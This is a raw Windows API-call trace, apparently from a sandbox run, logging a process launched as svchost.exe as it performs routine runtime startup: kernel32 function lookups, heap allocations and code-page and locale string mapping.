	[0188.383] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76b10000
	[0188.383] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0188.383] GetLastError () returned 0x57
	[0188.384] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0188.384] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x364) returned 0x2835d0
	[0188.384] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0188.384] SetLastError (dwErrCode=0x57) 
	[0188.384] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0xc00) returned 0x283940
	[0188.386] GetStartupInfoW (in: lpStartupInfo=0x1df734 | out: lpStartupInfo=0x1df734*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x58fc30, hStdOutput=0x416f8a8c, hStdError=0xfffffffe)) 
	[0188.386] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0188.386] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0188.386] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0188.386] GetCommandLineA () returned="svchost.exe"
	[0188.386] GetCommandLineW () returned="svchost.exe"
	[0188.386] GetLastError () returned 0x57
	[0188.386] SetLastError (dwErrCode=0x57) 
	[0188.386] GetLastError () returned 0x57
	[0188.386] SetLastError (dwErrCode=0x57) 
	[0188.386] GetACP () returned 0x4e4
	[0188.386] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x220) returned 0x284d48
	[0188.386] IsValidCodePage (CodePage=0x4e4) returned 1
	[0188.386] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1df764 | out: lpCPInfo=0x1df764) returned 1
	[0188.386] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1df02c | out: lpCPInfo=0x1df02c) returned 1
	[0188.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df640, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0188.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df640, cbMultiByte=256, lpWideCharStr=0x1dedc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0188.386] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpCharType=0x1df040 | out: lpCharType=0x1df040) returned 1
	[0188.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df640, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0188.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df640, cbMultiByte=256, lpWideCharStr=0x1ded78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0188.386] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0188.386] GetLastError () returned 0x57
	[0188.387] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0188.387] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0188.387] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0188.387] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x1deb68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0188.387] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x1df540, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf0\x64\x29\x41\x7c\xf7\x1d", lpUsedDefaultChar=0x0) returned 256
	[0188.387] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df640, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0188.387] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1df640, cbMultiByte=256, lpWideCharStr=0x1ded98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瘶YĀ") returned 256
	[0188.387] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瘶YĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0188.387] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ瘶YĀ", cchSrc=256, lpDestStr=0x1deb88, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256
	[0188.387] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x1df440, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xf0\x64\x29\x41\x7c\xf7\x1d", lpUsedDefaultChar=0x0) returned 256
	[0188.387] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x0, Size=0x80) returned 0x2818b0
	[0188.387] RtlInitializeSListHead (in: ListHead=0x5b3e70 | out: ListHead=0x5b3e70) 
	[0188.388] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.388] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeConditionVariable") returned 0x77389981
	[0188.388] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableCS") returned 0x76b418be
	[0188.388] GetProcAddress (hModule=0x76b10000, lpProcName="WakeAllConditionVariable") returned 0x773545a5
	[0188.388] RtlInitializeConditionVariable (in: ConditionVariable=0x5b3e28 | out: ConditionVariable=0x5b3e28) 
	[0188.388] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0188.388] GetProcAddress (hModule=0x76b10000, lpProcName="FlsAlloc") returned 0x76b6418d
	[0188.388] GetProcAddress (hModule=0x76b10000, lpProcName="FlsFree") returned 0x76b61f61
	[0188.388] GetProcAddress (hModule=0x76b10000, lpProcName="FlsGetValue") returned 0x76b61e16
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="FlsSetValue") returned 0x76b676e6
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSectionEx") returned 0x76b63879
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="InitOnceExecuteOnce") returned 0x76b59601
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="CreateEventExW") returned 0x76b124d8
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSemaphoreW") returned 0x76b4db8b
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSemaphoreExW") returned 0x76b42111
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolTimer") returned 0x76b4b009
	[0188.389] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadpoolTimer") returned 0x773589be
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7734c02a
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolTimer") returned 0x7734c0d2
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolWait") returned 0x76b43f78
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadpoolWait") returned 0x77358bfb
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolWait") returned 0x7734b567
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="FlushProcessWriteBuffers") returned 0x77375998
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77342251
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessorNumber") returned 0x773428f6
	[0188.390] GetProcAddress (hModule=0x76b10000, lpProcName="CreateSymbolicLinkW") returned 0x76b99aa9
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentPackageId") returned 0x0
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount64") returned 0x76b4eb4e
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="GetFileInformationByHandleEx") returned 0x76b538ad
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="SetFileInformationByHandle") returned 0x76b48d0f
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeConditionVariable") returned 0x77389981
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="WakeConditionVariable") returned 0x773d5a7b
	[0188.391] GetProcAddress (hModule=0x76b10000, lpProcName="WakeAllConditionVariable") returned 0x773545a5
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableCS") returned 0x76b418be
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeSRWLock") returned 0x77389981
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="AcquireSRWLockExclusive") returned 0x7738334e
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77361801
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="ReleaseSRWLockExclusive") returned 0x77383324
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="SleepConditionVariableSRW") returned 0x76b423f5
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="CreateThreadpoolWork") returned 0x76b489f2
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="SubmitThreadpoolWork") returned 0x773426a9
	[0188.392] GetProcAddress (hModule=0x76b10000, lpProcName="CloseThreadpoolWork") returned 0x77342111
	[0188.393] GetProcAddress (hModule=0x76b10000, lpProcName="CompareStringEx") returned 0x76b6ebc6
	[0188.393] GetProcAddress (hModule=0x76b10000, lpProcName="GetLocaleInfoEx") returned 0x76b453a5
	[0188.393] GetProcAddress (hModule=0x76b10000, lpProcName="LCMapStringEx") returned 0x76b9f72b
	[0188.393] RtlAllocateHeap (HeapHandle=0x260000, Flags=0x8, Size=0x800) returned 0x284f70
	[0188.393] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
